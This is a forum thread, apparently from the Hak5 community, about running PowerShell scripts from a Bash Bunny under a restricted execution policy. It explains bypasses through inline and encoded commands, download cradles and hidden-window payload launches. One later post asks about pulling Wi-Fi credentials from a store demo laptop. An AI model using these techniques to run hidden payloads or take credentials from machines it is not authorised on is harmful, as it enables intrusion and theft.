Jump to content

Powershell Scripts


Leeemmery

Recommended Posts

Has anyone addressed or had problems with running scripts on PowerShell.

As the default on my windows 10 64bit all the lastest updates disables running of scripts, this can be changed with the Set-ExecutionPolicy but this needs Administrator access to change.

Am I missing something really simple!?

Link to comment
Share on other sites

Script execution bypassed can also be achieved by running the script as a command or encoded command.

What a lot of people have learned to do here is build stagers and download cradles .

Just wanted to take a moment to say congrats to the Hak5 team.  With their inventions, people who get them and really want to use them are forced to learn techniques the bad guys use like learning to code your own stagers and cradles.

Back to the subject.  If your script extremely small and simple you can just open a powershell prompt with quack commands and type out what you want to do and exit when done.  If it is large you will see people build web servers on the bunny, SMB server or even serve it via USB storage from the bunny with maybe some obfuscation if it is a detectable script. 

From the command line they run powershell with all the parameters to hide it and end it with the "-c" and their code inline to download the script from their bunny and execute it.  Most are done that way.  You could also encode it and use the "-Enc" or any truncation of "-encodedcommand" .

Example, set your execution policy for restricted and try the below command.

powershell -C "$a='I Still Ran.';Write-Host $a;sleep -s 5"

The above should still run.

If you do a "powershell /?", you will see at the bottom of help how to make an encoded command. If you do that to a whole script you can run that script from the command line with that encoding and bypass the execution policy.  As long as it doesn't go longer than the commandline limit which is around 8k characters.  You could of course compress the script and include the decompression code with it and encode all that.  Powersploit has a script to do that.

So, if you look through everyone's payloads, you will see how it is getting bypassed.  Most of the payloads need to run as admin so some may have the bypass parameter but you will see a few that do not, like the powershell command to start the cmd process as admin using start-process all from the run box.

Link to comment
Share on other sites

11 hours ago, PoSHMagiC0de said:

Script execution bypassed can also be achieved by running the script as a command or encoded command.

What a lot of people have learned to do here is build stagers and download cradles .

Just wanted to take a moment to say congrats to the Hak5 team.  With their inventions, people who get them and really want to use them are forced to learn techniques the bad guys use like learning to code your own stagers and cradles.

Back to the subject.  If your script extremely small and simple you can just open a powershell prompt with quack commands and type out what you want to do and exit when done.  If it is large you will see people build web servers on the bunny, SMB server or even serve it via USB storage from the bunny with maybe some obfuscation if it is a detectable script. 

From the command line they run powershell with all the parameters to hide it and end it with the "-c" and their code inline to download the script from their bunny and execute it.  Most are done that way.  You could also encode it and use the "-Enc" or any truncation of "-encodedcommand" .

Example, set your execution policy for restricted and try the below command.


powershell -C "$a='I Still Ran.';Write-Host $a;sleep -s 5"

The above should still run.

If you do a "powershell /?", you will see at the bottom of help how to make an encoded command. If you do that to a whole script you can run that script from the command line with that encoding and bypass the execution policy.  As long as it doesn't go longer than the commandline limit which is around 8k characters.  You could of course compress the script and include the decompression code with it and encode all that.  Powersploit has a script to do that.

So, if you look through everyone's payloads, you will see how it is getting bypassed.  Most of the payloads need to run as admin so some may have the bypass parameter but you will see a few that do not, like the powershell command to start the cmd process as admin using start-process all from the run box.

Nice trick. Feel free to turn it into a tutorial and you can put it on the Doc/Tut Github. Going to release it publicly once I get a few more docs and tuts.

Link to comment
Share on other sites

  • 1 year later...

Working at a big box store...PCMgr left and no one knows the wifi password...powershell and cmd are disabled on LT in demo mode...will bashbunny be able to pull wifi creds without access to powershell od cnd

Tia,

Zeek

Link to comment
Share on other sites

  • 4 months later...
On 9/18/2017 at 10:25 AM, PoSHMagiC0de said:

Script execution bypassed can also be achieved by running the script as a command or encoded command.

What a lot of people have learned to do here is build stagers and download cradles .

Just wanted to take a moment to say congrats to the Hak5 team.  With their inventions, people who get them and really want to use them are forced to learn techniques the bad guys use like learning to code your own stagers and cradles.

Back to the subject.  If your script extremely small and simple you can just open a powershell prompt with quack commands and type out what you want to do and exit when done.  If it is large you will see people build web servers on the bunny, SMB server or even serve it via USB storage from the bunny with maybe some obfuscation if it is a detectable script. 

From the command line they run powershell with all the parameters to hide it and end it with the "-c" and their code inline to download the script from their bunny and execute it.  Most are done that way.  You could also encode it and use the "-Enc" or any truncation of "-encodedcommand" .

Example, set your execution policy for restricted and try the below command.


powershell -C "$a='I Still Ran.';Write-Host $a;sleep -s 5"

The above should still run.

If you do a "powershell /?", you will see at the bottom of help how to make an encoded command. If you do that to a whole script you can run that script from the command line with that encoding and bypass the execution policy.  As long as it doesn't go longer than the commandline limit which is around 8k characters.  You could of course compress the script and include the decompression code with it and encode all that.  Powersploit has a script to do that.

So, if you look through everyone's payloads, you will see how it is getting bypassed.  Most of the payloads need to run as admin so some may have the bypass parameter but you will see a few that do not, like the powershell command to start the cmd process as admin using start-process all from the run box.

hello, how can I say so join that example with my line of code

CODE: RUN WIN C:/Windows/System32/WindowsPowerShell/v1.0/powershell  -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads//$SWITCH_POSITION\1.ps1')"

Link to comment
Share on other sites

  • 1 year later...

I'm extremely confused because the dump creds said to put the power she'll script on the root of the bunny but I thought it's had to be on the switch which on is it I could use some help and some advice I'm new to this not a developer just a script kiddy I'm just now getting into developing

Link to comment
Share on other sites

so I'm having trouble with my bash bunny when I go to use the serial console it says enter in the user name which is root but when I enter in the user name it freezes and wont let me enter in the password for the account it all on the default account settings too and I cant figure out how to change the password or take out the username and hostname so that I'm just prompted to use the password since I can only enter in one thing can someone give me some advice.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...